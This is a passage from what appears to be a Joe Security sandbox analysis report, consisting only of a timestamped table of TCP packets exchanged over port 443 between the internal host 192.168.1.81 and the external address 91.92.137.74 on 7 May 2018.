Mai 7, 2018 14:50:59.079272032 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:59.079611063 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.079823971 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.080403090 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:59.080718040 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.191762924 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.191813946 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:59.192903042 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.194086075 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:59.194116116 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:00.519529104 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:00.519761086 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:00.536766052 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:00.536802053 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:00.543488026 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:00.543520927 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:01.176707029 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:01.176886082 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.176939964 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:01.182810068 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.183203936 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.183348894 MESZ 443 49197 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:01.183465958 MESZ 49197 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.310216904 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.310261011 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:01.310373068 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.311722994 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:01.311755896 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:02.977124929 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:02.977395058 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:02.990880966 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:02.990916967 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:02.997071028 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:02.997104883 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:03.341708899 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:03.341903925 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.341964960 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:03.342415094 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.342776060 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.343168020 MESZ 443 49198 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:03.343286037 MESZ 49198 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.457916021 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.457973003 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:03.458036900 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.459322929 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:03.459357023 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.012702942 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.012825012 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.025315046 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.025341988 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.032085896 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.032113075 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.340399027 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.340635061 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.340677023 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.341181040 MESZ 49199 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 54 of 149
Mai 7, 2018 14:51:05.341511965 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.341810942 MESZ 443 49199 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.341944933 MESZ 49199 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.460452080 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.460500956 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:05.460560083 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.461771011 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:05.461795092 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:06.803219080 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:06.803344011 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:06.819919109 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:06.819996119 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:06.826219082 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:06.826297045 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:07.343210936 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:07.343528986 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.343614101 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:07.344247103 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.344727993 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.344832897 MESZ 443 49200 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:07.345804930 MESZ 49200 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.453061104 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.453119993 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:07.453200102 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.454351902 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:07.454380035 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:08.731523991 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:08.731800079 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:08.748501062 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:08.748524904 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:08.755420923 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:08.755445957 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.234482050 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.234714031 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.234744072 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.235074997 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.235436916 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.235800028 MESZ 443 49201 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.235898972 MESZ 49201 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.349036932 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.349088907 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.349150896 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.350394964 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.350425959 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.969845057 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.969985962 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.981004953 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.981034040 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:09.988256931 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:09.988281012 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:10.352138042 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:10.352308035 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.352330923 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:10.352762938 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.738360882 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.738591909 MESZ 443 49202 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:10.738951921 MESZ 49202 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.865135908 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.865204096 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:10.865273952 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.866624117 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:10.866662025 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.399173021 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.399347067 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.436749935 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.436816931 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.447462082 MESZ 49203 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 55 of 149
Mai 7, 2018 14:51:11.447509050 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.770293951 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.770458937 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.770490885 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.770571947 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.770586967 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.772789001 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.921298027 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:11.921510935 MESZ 443 49203 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:11.921596050 MESZ 49203 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.040340900 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.040435076 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.040563107 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.042457104 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.042525053 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.526236057 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.526516914 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.564495087 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.564532042 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.571608067 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.571650028 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.912061930 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.912189960 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.912228107 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.912786961 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.912822008 MESZ 443 49204 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:12.913149118 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.913270950 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:12.913373947 MESZ 49204 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.070888996 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.070934057 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.071501970 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.072845936 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.072871923 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.651885986 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.652120113 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.670511007 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.670537949 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.677241087 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.677268028 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.988236904 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.988382101 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.988413095 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.991056919 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:13.991077900 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:13.995068073 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.004045010 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.004246950 MESZ 443 49205 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:14.004774094 MESZ 49205 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.386193991 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.386240005 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:14.386317015 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.387579918 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:14.387603998 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.165487051 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.165676117 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.462631941 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.462667942 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.468892097 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.468916893 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.714571953 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.714781046 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.714803934 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.715380907 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.715715885 MESZ 49206 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.715858936 MESZ 443 49206 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.716389894 MESZ 49206 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 56 of 149
Mai 7, 2018 14:51:15.832990885 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.833055019 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:15.834505081 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.835881948 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:15.835907936 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.314941883 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.315368891 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.396033049 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.396069050 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.403004885 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.403029919 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.606842995 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.607000113 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.607028008 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.612224102 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.926951885 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:16.927186966 MESZ 443 49207 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:16.927277088 MESZ 49207 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.054488897 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.054547071 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.054647923 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.055788994 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.055821896 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.557553053 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.557775974 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.605775118 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.605834961 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.616370916 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.616406918 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.980303049 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.980737925 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.980798960 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.983159065 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.983428955 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:17.983544111 MESZ 443 49208 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:17.983642101 MESZ 49208 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.145566940 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.145632982 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:18.145716906 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.147061110 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.147094965 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:18.966559887 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:18.966701984 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.977471113 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.977492094 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:18.983933926 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:18.983954906 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:19.455952883 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:19.456152916 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.456177950 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:19.456770897 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.456960917 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.457290888 MESZ 443 49209 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:19.457432985 MESZ 49209 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.589975119 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.590029001 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:19.590120077 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.591428041 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:19.591453075 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.105134964 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.107435942 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.130228043 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.130281925 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.138485909 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.138524055 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.374150038 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.374330044 MESZ 49210 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 57 of 149
Mai 7, 2018 14:51:20.374356985 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.375066042 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.784604073 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.784854889 MESZ 443 49210 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.787097931 MESZ 49210 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.928936005 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.928981066 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:20.929049969 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.930382013 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:20.930406094 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.508214951 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.508389950 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.528871059 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.528904915 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.535285950 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.535316944 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.775418997 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.775573969 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.775599003 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.782768965 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.782799959 MESZ 443 49211 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:21.782876015 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.783058882 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:21.783128023 MESZ 49211 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.046113014 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.046166897 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.046267033 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.047467947 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.047498941 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.530987978 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.531269073 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.621103048 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.621160984 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.628624916 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.628668070 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.808823109 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.808934927 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.808964968 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.809536934 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.946433067 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:22.946593046 MESZ 443 49212 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:22.949110985 MESZ 49212 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.074807882 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.074856997 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:23.074965954 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.076220989 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.076246023 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:23.839342117 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:23.839447975 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.851680994 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.851707935 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:23.857605934 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:23.857645988 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.080918074 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.081113100 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.081167936 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.082355022 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.090504885 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.090693951 MESZ 443 49213 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.090854883 MESZ 49213 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.205662012 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.205729961 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.205800056 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:24.207050085 MESZ 49214 443 192.168.1.81 91.92.137.74
